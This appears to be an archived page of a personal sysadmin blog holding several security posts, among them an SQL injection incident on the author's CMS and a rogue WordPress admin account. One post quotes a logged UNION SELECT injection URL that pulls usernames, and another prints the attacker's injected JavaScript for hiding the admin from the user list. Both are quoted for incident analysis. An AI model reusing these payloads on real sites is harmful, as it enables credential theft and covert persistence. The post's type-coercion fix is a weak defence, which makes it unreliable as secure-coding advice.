Security | /usr/local.com

SQL exploits

April 11th, 2012 | by matt | security, sysadmin

Apr
11

You know its going to be a bad day when you get the following email:

Did someone hack our website? It looks like a Chinese news listing entry has been added with today’s date.

Ballsack!

Time to roll up the sleeves. How bad is the damage?

From the looks of it, other sites on the web server had not been damaged. Doing a search for modified files found nothing out of the ordinary had been changed. Log files sure but nothing out of the ordinary. A search through the web logs of the site showed that this appeared to be an attack on the Content Management System (CMS) for the site.

Whichever jackass wrote that code should be beaten! Get the torches and pitchforks, death to the programmer!! Oh wait, that was me. Death to the evil script kiddie that attacked my beautiful code!!!!!!!!!

Searching through the logs, I started seeing some interesting logs. A bunch of them that had variations such as this:

http://unigleeclub.com/news.phtml?id=-999.9%20UNION%20ALL%20SELECT%200x31303235343830303536,(SELECT%20concat(0x7e,0x27,Hex(cast(user.username%20as%20char)),0x27,0x7e)%20FROM%20`gleeclub`.user%20LIMIT%203,1)%20,0x31303235343830303536,0x31303235343830303536--

This one is actually after a lot of hits from the attacker of figuring out the tables and then getting down to the nitty gritty of pulling out a username and password.

The issue was that I had forgotten to sanitize my data. Like a jackass, I didn’t check that $id was an actual integer variable and when they ran thier script they were able to pull out a hex string that, with the use of such tools as this site, you can easily translate this into text.

The Quick Fix

I put in 2 fixes to ensure that we were dealing with an integer value here. First, I did some simple math to the variable that changes its type if it is not an integer.

$id = $id+0;

If you have a string, you’ll get back a zero. If you have an integer value, you’re good to go.

Also in the code, I expanded the if statement that was around the code to grab the specific news item. Instead of just checking to see if the $id variable was set, I now check to see if it is set and greater than zero, another layer in ensuring that we have a number instead of a string of text.

//Before:
if(isset($id) && $id != "")

//After:
if(isset($id) && $id != "" && $id > 0)

We’re all human and humans make mistakes. This code that was exploited was written 8 years ago at a time when I should have known better, but missed it. It lived in the wild up until last year when it was finally exploited. I’m lucky that it took that long for it to expose itself, but kind of embarrassed that it was there in the first place. While I tend to come down hard on people for not doing these sort of things, its only because I’ve learned my lesson the hard way and have seen people continually mess this stuff up. While this happened to me a while ago, I’ve had friends get bit by this very recently so I figured it was time to finish off this post and get it out the door. An ounce of prevention sort of thing.

To lear more about SQL Inject attacks, here is a good article by Bhanu Mahesh on Quality Software Connection on how to prevent them.

Comments Closed

Privacy Wars

April 23rd, 2011 | by matt | apple, rants, security

Apr
23

A recently article from the guardian shows that your iPhone keeps record of everywhere you go. Many of your know that I’m an iPhone user and supporter as I have a often neglected iPhone App site.

You’re probably thinking to yourself right now, great, another fanboy coming to Apple’s rescue.

WRONG!

What the fuck Apple? Seriously, what the fuck? Is there a good reason for keeping track of this data? I mean seriously, what are you doing with it?

Actually, there is a good reason for it and its all about advertising. The guys at work have heard this on multiple occasions that the iPod, iPhone, iTouch, iPad are all marketing devices. Mainly for selling anything and everything from iTunes but with iAd, they can now sell you anything. It turns out with a little googling you can find that the Terms and Conditions changed with iOS 4 and there was a feature explained that Apple can track you to provide more relevant ads to your phone. And to also provide features such as Find My iPhone.

To provide location-based services on Apple products, Apple and our partners and licensees may collect, use, and share precise location data, including the real-time geographic location of your Apple computer or device. This location data is collected anonymously in a form that does not personally identify you and is used by Apple and our partners and licensees to provide and improve location-based products and services. For example, we may share geographic location with application providers when you opt in to their location services.

Some location-based services offered by Apple, such as the MobileMe “Find My iPhone” feature, require your personal information for the feature to work.

Apple and its partners use cookies and other technologies in mobile advertising services to control the number of times you see a given ad, deliver ads that relate to your interests, and measure the effectiveness of ad campaigns. If you do not want to receive ads with this level of relevance on your mobile device, you can opt out by accessing the following link on your device: http://oo.apple.com. If you opt out, you will continue to receive the same number of mobile ads, but they may be less relevant because they will not be based on your interests. You may still see ads related to the content on a web page or in an application or based on other non-personal information. This opt-out applies only to Apple advertising services and does not affect interest-based advertising from other advertising networks.

So does this make it right? No, I don’t think so. I think this sort of tracking is very very wrong. If you want to put up a service like this, it should be in the app to disclose my location. If I’m a developer, I have to allow for this pop up to appear. But apparently apple and their iAds do not. That is where we have an issue. The end user is used to the pop up appearing and only then does their location information get used. However, Apple apparently bypasses this for their iAd service which is not honoring the end user wishes in all cases.

So what can you do?

I know I only have myself to blame for this one as I should have read the terms and conditions more closely. But there is a way out of it. Just as you read above, simply go to http://oo.apple.com/ on your iOS device and you can opt out of the tracking. (Credit Geeky-Gadgets.com for this post.

What about Google

Don’t worry Android fans, you’re not left out in the cold either. Turns out the Wall Street Journal has discovered that Google is also transmitting data from the Android.

And don’t forget about the google street cars and their tomfoolery.

There is a site out there that can map the location of your wireless router via the Google Android’s Wardriving Database. I put in the mac address of my wireless router and was not surprised to find it in there with a GPS coordinate of my street. Awesome!

So now what?

Like many people out there, I was pretty pissed at Apple and Google to begin with. But at the same time, its my own damn fault, I didn’t read the Terms and Conditions like I should.

We live in a society of ever increasing intrusions into our private lives. These intrusions must be fought off in order to keep our private lives private. So my friends, opt out whenever you can and stay vigilant of new “features” that are released. Your privacy is only good if you fight to protect it.

Comments Closed

20%

January 2nd, 2010 | by matt | security, sysadmin

Jan
02

We launched our Hosted Exchange 2007 Product just over a year ago. And for the most part, things have gone great.

One of our early decisions was to balance the security of the system while making the system as user friendly as possible. Originally, we had a pretty strict password policy. We soon found that many of our customers were not too happy with this policy and thought it was too much. Were we out of control security freaks? Shouldn’t the customer appreciate the steps that we are taking to not only secure our servers, but their information!

Looking around at other vendors, we quickly found that we may be a bit too harsh. Take Gmail for example. Sure its not exchange. But then again it has over 100 million users. If they had massive issues with security and hacking, they clearly have it under control behind the scenes so things do not get out of hand.

And have you ever been prompted to change your password on gmail? I haven’t.

So we compromised. We altered the time between when the system forces you to change your password. We altered the number of passwords that you could recycle. And we also added a somewhat buried feature in our customer portal. That feature, ‘allow passwords to never expire’

Holy crap! Let’s just blow a huge freaking hole in the security system shall we.

This was a feature that we were not all that happy about, but with the other measures in place we figured we would avoid passwords such as abc123. It makes the end user happy, we have some level of security though not as high and tight as we would like. But its better than having things wide open.

Now here is the shocking part of this. 20% of our users have this feature enabled. 20-feaking-percent! I was really hoping for this number to be in the 5-10% range.
But no, 1 in 5 of our users will never change their password again.

Or will they?

I’m currently developing a nag script that will send out a reminder to the end users ever couple of months. Not enough to completely annoy the heck out of them. But hopefully enough to get a good portion of that 20% to change their passwords on a semi-regular basis.

So what do you do for your password policy? Leave your tips and tricks in the comments section. We’d like to hear what you think is an acceptable policy to stay secure!

Comments Closed

WordPress Security Concern

September 13th, 2009 | by matt | security, sysadmin

Sep
13

I’m not sure if you’ve applied the latest updates for wordpress but I did last week. However, it appears that someone got in to one of the blogs that I manage and created an account for themselves. They didn’t do anything with it, but they DID have full admin access. I’m assuming that this was due to a security bug in 2.8.3 as they were in when that was on the server.

So patch your servers if you haven’t already!

Here’s how I noticed that the person had gotten in. I was doing an audit on the users on the site and noticed that the count next to Administrators stated that there were 3 Admins for the site. However, when I viewed the list, there were only 2 on the page. Taking a look in the database, I noticed a user with a goofy name for an admin. And peaking in the wp_usermeta table, I noticed the following attribute was assigned to their firstname:

for (var i = 0; i < tags.length; i++) {
var t=tags[i].innerHTML;
var h=tags[i];
if(t.indexOf(s)>0){
s =(parseInt(t)-1)+s;
h.removeChild(h.firstChild);
t = document.createTextNode(s);
h.appendChild(t);
}
}
var arr=document.getElementsByTagName("ul");
for(var i in arr) if(arr[i].className=="subsubsub"){
var n=/>Administrator ((d+))</gi.exec(arr[i].innerHTML);
if(n[1]>0){
var txt=arr[i].innerHTML.replace(/>Administrator ((d+))</gi,">Administrator ("+(n[1]-1)+")<");
arr[i].innerHTML=txt;
}
}
}catch(e){};
};
addLoadEvent(setUserName);

Its not formatted the greatest, but basically, it hides the username from the list. Nice eh! Simply deleting this entry made the user show up in the user list where I was able to do some auditing before blowing away the user.

So audit your admin list and patch your servers! This could have been a lot worse if they had starting defacing the site or hiding other gems on there.

-Matt

Comments Closed

Verisign Spam

July 21st, 2009 | by matt | rants, security, spam, sysadmin

Jul
21

Some people never learn. If you spam me, there is a good chance that I WILL mock you on the internet. Sure my site gets all of 2 readers a week, but they will know how big of a jackass you are.

Here is the spam that I got from Verisign:

—— Forwarded Message
From: “Borgches, Sergio”
Date: Thu, 16 Jul 2009 11:39:24 -0500
To: Webmaster
Subject: Ineffective EV SSL Certificate on domain: my.lightedge.com

Dear Webmaster

Ineffective EV SSL Certificate on domain: my.lightedge.com

Are you aware that the Extended Validation (EV) SSL Certificate that
you have on your domain does not display the standard EV interface
that your customers are expecting on Firefox 3.5?

Mozilla launched the latest version of their browser, on 2 July 2009.
Not only has it won the Guinness World Record for more than a
million downloads in a short time, but Firefox 3 currently accounts
for over 20% of global browser market share.

Instead of displaying the GREEN address bar, which reassures visitors
that your site is safe and authentic, it is displaying the BLUE
address bar, which means they do not get the full benefit of EV.
(Please see screenshot attached).

A rapidly growing portion of your Web site visitors are not seeing
the green address bar. It has shown in research that users look for
the green address bar on the sites with which they transact and that
77% of users will hesitate to complete the transaction on a site that
once had the green address bar but no longer does (TecEd study,
2007).

VeriSign is the leader in EV SSL security and we would like to assist
you to rectify this problem by offering you a replacement EV SSL
Certificate AT NO CHARGE! Our Extended Validation SSL Certificates
trigger the green bar in Firefox 3.5. We work closely with the
browser manufacturers to make sure that our customers’ security is
always world class and that there are no interruptions in your online
security.

To take advantage of this offer, and to make sure that your address
bar is GREEN in all current EV-enabled browsers please contact me and
I’ll help you switch to VeriSign, the worldwide leader in trusted
Internet communications and commerce.

Yours faithfully

Sergio Borgches
Inside Sales Executive
VeriSign Security Services
sborgches@verisign.com
Toll Free: 866.893.6565 option 1 ext 2296

First off Sergio, the webmaster address? Really? Like anyone really reads that stuff anymore. Half the time these go to an admin buried deep in cubeland who has filters that take webmaster, hostmaster and yourmom@domain.com and filter them into the bit bucket. I have these same filters, I’m that guy! I just happened to be going through my spam folder (yes, it was caught as spam Sergio!) when I found this little gem. I just couldn’t pass it up. Here’s my advice Sergio, if you really wanted to get someone’s attention, you CALL them.

Now, besides the fact that you didn’t call, this is a bit like ambulance chasing if you ask me. And I can’t say that I really blame you for it, but it still makes you a scum bag. The issue isn’t with the certificate. The certificate is STILL an Extended Validation (EV) certificate that shows up with the green bar in just about every browser that is out there except for Firefox 3.5. Why? Well its a bug in the browser. More details can be found here. If you happen to have a Verisign, Thawte or I think GeoTrust, you’re fine. This just seems to be an issue with a few providers. Globalsign being one of those. But never fear, addons.mozilla.com is also protected by a GlobalSign EV certificate so they are well aware of this issue. But instead of taking the high road and just putting out a press release saying that Verisign customers are not affected by the latest EV certificate issues in FireFox 3.5, you took the lowest road of them all and sent out spam spreading fear, uncertainty and doubt. Way to keep it classy!

So this Sergio is why I’m not going to swing my business over to you. Sure you’re just trying to get a leg up on the competition. But the methods in which you are doing it make me want to work with GlobalSign even more.

Comments Closed